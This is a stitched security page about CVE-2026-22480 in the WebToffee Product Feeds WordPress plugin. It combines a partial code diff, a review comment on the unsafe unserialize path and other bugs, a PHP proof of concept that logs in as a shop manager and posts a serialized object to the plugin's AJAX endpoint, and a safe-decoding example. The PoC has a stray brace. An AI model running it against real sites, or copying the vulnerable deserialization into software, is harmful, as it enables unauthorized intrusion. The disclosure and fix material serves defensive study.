-							$attributes[ 'wt_pf_cattr_'. $key ] = ucwords( str_replace( '-', ' ', $arr_value['name'] ) );
-						}
-					}
+		/**
+		*   Get default value of advanced settings
+		*   @return     array   array of default values
+		*
+		*/
+		public static function get_advanced_settings_default()
+		{
+			$fields=self::get_advanced_settings_fields();
+			foreach ($fields as $key => $value)
+			{
+				if(isset($value['value']))
+				{
+					$key=(substr($key,0,8)!=='wt_pf_' ? 'wt_pf_' : '').$key;
+					$out[$key]=$value['value'];
 				}
 			}
+			return $out;
 		}

-		return $attributes;
-	}
-
-	public static function get_geneder_list(){
-			$gender_options = array(
-		'male'           => _x( 'Male', 'product gender', 'webtoffee-product-feed' ),
-		'female'   => _x( 'Female', 'product gender', 'webtoffee-product-feed' ),
-		'unisex'          => _x( 'Unisex', 'product gender', 'webtoffee-product-feed' ),
-	);
+		/**
+		*   Get advanced fields
+		*   @return     array   array of fields
+		*
+		*/
+		public static function get_advanced_settings_fields()
+		{
+			$fields=array();
+			return apply_filters('wt_pf_advanced_setting_fields_basic', $fields);
+		}
+
+		public static function wt_allowed_screens(){
+			$screens=array('webtoffee_product_feed_main_export', 'webtoffee_product_feed_main_history', 'webtoffee_product_feed', 'webtoffee-product-feed');
+			return apply_filters('wt_pf_allowed_screens_basic', $screens);

-	return apply_filters( 'wt_feed_product_gender_options', $gender_options );
-	}
-
-	public static function get_age_group(){
-		$age_group	 = array(
-			'all ages' => __( 'All ages', 'webtoffee-product-feed' ),
-			'adult' => __( 'Adult', 'webtoffee-product-feed' ),
-			'teen' => __( 'Teen', 'webtoffee-product-feed' ),
-			'kids' => __( 'Kids', 'webtoffee-product-feed' ),
-			'toddler' => __( 'Toddler', 'webtoffee-product-feed' ),
-			'infant' => __( 'Infant', 'webtoffee-product-feed' ),
-			'newborn' => __( 'Newborn', 'webtoffee-product-feed' )
-		);
+		}
+		public static function wt_get_current_page(){
+			return (isset($_GET['page'])) ? sanitize_text_field(wp_unslash($_GET['page'])) : ''; //phpcs:ignore WordPress.Security.NonceVerification.Recommended
+		}
+
+		public static f
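
Review bot: In `process_formdata()`, the new first statement still sends any input that passes `is_serialized()` through `self::wt_unserialize_safe($form_data)`, so the PHP-serialized path for `form_data` stays reachable and the fix rests entirely on a helper whose body is not part of these lines. Please confirm that the helper refuses objects (for example `unserialize()` with `allowed_classes` set to `false`) and rejects the input instead of passing an incomplete object on, or drop the serialized branch and accept JSON only. `get_product_custom_attributes()` also still calls `maybe_unserialize( $value->type )` on stored `_product_attributes` meta, which deserves the same treatment as the request path. Three smaller points in the re-indented code: `get_local_attributes()` reads the cache key `wt_feed_dropdown_product_local_attr_v4` but writes `wt_feed_dropdown_product_local_attr_v1`, so as far as these lines show the lookup never hits; `substr($key,0,8)!=='wt_pf_'` in `get_advanced_settings()` and `get_advanced_settings_default()` compares eight characters against a six-character string, so the prefix is always prepended, and `$out` in the latter is never initialised before `return $out;`; and the `<option value="%s">%s</option>` lines interpolate `$key` and `$value` without `esc_attr()` or `esc_html()`.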

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-22480 - WebToffee WooCommerce Product Feeds – Google Shopping, Pinterest, TikTok Ads, & More <= 2.3.3 - Authenticated (Shop manager+) PHP Object Injection

/**
 * Proof of Concept for CVE-2026-22480
 * Requires: Shop manager or higher WordPress credentials
 * Target: WordPress site with vulnerable WebToffee Product Feeds plugin (<=2.3.3)
 *
 * This script demonstrates the PHP object injection vulnerability by sending
 * a serialized payload to the vulnerable AJAX endpoint.
 *
 * WARNING: This is for authorized security testing only.
 */

$target_url = 'https://example.com/wp-admin/admin-ajax.php';
$username = 'shop_manager_user';
$password = 'shop_manager_pass';

// Create a malicious serialized object payload
// This is a demonstration payload - actual exploitation requires a POP chain
$malicious_object = 'O:8:"stdClass":1:{s:4:"test";s:9:"injected!";}';

// WordPress AJAX action for the vulnerable plugin
$ajax_action = 'wt_product_feed_export_ajax';

// Initialize cURL session
$ch = curl_init();

// First, authenticate to get WordPress cookies
$login_url = str_replace('/admin-ajax.php', '/wp-login.php', $target_url);

$login_fields = [
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url,
    'testcookie' => '1'
];

curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_fields));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

$response = curl_exec($ch);

// Check if authentication was successful
if (strpos($response, 'dashboard') === false && strpos($response, 'admin') === false) {
    die("Authentication failed. Check credentials.");
}

// Now send the exploit payload to the vulnerable AJAX endpoint
$exploit_fields = [
    'action' => $ajax_action,
    'form_data' => $malicious_object,
    'security' => 'dummy_nonce', // Nonce may be required but could be bypassed
    'step' => 'export',
    'offset' => '0'
];

curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($exploit_fields));
curl_setopt($ch, CURLOPT_REFERER, str_replace('/admin-ajax.php', '/wp-admin/', $target_url));

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

curl_close($ch);

// Analyze response
if ($http_code == 200) {
    echo "Exploit attempt completed. HTTP 200 response received.\n";
    echo "Response length: " . strlen($response) . " bytes\n";
    
    // Check for signs of successful injection
    if (strpos($response, 'injected!') !== false) {
        echo "SUCCESS: Payload appears to have been executed.\n";
    } else if (strpos($response, 'serialize') !== false || strpos($response, 'unserialize') !== false) {
        echo "Possible error in deserialization detected.\n";
    }
} else {
    echo "Request failed with HTTP code: $http_code\n";
}
}

// Clean up
if (file_exists('cookies.txt')) {
    unlink('cookies.txt');
}

?>
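The receiving side of the request above, as an added example that is not the plugin's code and not the patch's `wt_decode_data`: two ways a handler can decode `form_data` without instantiating attacker-chosen classes. The function names and the JSON sample are assumptions made for illustration; the serialized value is the `stdClass` test string from the PoC. Requires PHP 8.0 or later.

```php
<?php
// Added example, not the plugin's code. All function names are hypothetical.

// Constructed inputs: the test value from the PoC and a JSON-encoded form body.
const POC_VALUE  = 'O:8:"stdClass":1:{s:4:"test";s:9:"injected!";}';
const JSON_VALUE = '{"step":"export","offset":0,"fields":{"title":"Feed A"}}';

/** True if any nested value is an object (including __PHP_Incomplete_Class). */
function contains_object(mixed $value): bool {
    if (!is_array($value)) {
        return is_object($value);
    }
    foreach ($value as $item) {
        if (contains_object($item)) {
            return true;
        }
    }
    return false;
}

/** Preferred: accept JSON only, so no PHP class is ever instantiated. */
function decode_form_data_json(string $raw): array {
    $data = json_decode($raw, true, 16, JSON_THROW_ON_ERROR);
    if (!is_array($data)) {
        throw new InvalidArgumentException('form_data must be a JSON object or array');
    }
    return $data;
}

/** Fallback for stored legacy data: unserialize with every class disallowed.
 *  Objects become __PHP_Incomplete_Class, so no application magic methods run. */
function decode_form_data_legacy(string $raw): array {
    $data = @unserialize($raw, ['allowed_classes' => false]);
    if (!is_array($data) || contains_object($data)) {
        throw new InvalidArgumentException('form_data must be an array of scalars');
    }
    return $data;
}

// Run each input through both decoders and report accept/reject.
foreach ([POC_VALUE, JSON_VALUE, serialize(['step' => 'export'])] as $raw) {
    foreach (['decode_form_data_json', 'decode_form_data_legacy'] as $decoder) {
        try {
            $result = 'accepted ' . json_encode($decoder($raw));
        } catch (Throwable $e) {
            $result = 'rejected (' . get_class($e) . ')';
        }
        printf("%-24s %-40.40s %s\n", $decoder, $raw, $result);
    }
}
```

Both decoders reject the PoC's object string; the JSON decoder also rejects every PHP-serialized input, which is why it is the safer default for request data.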
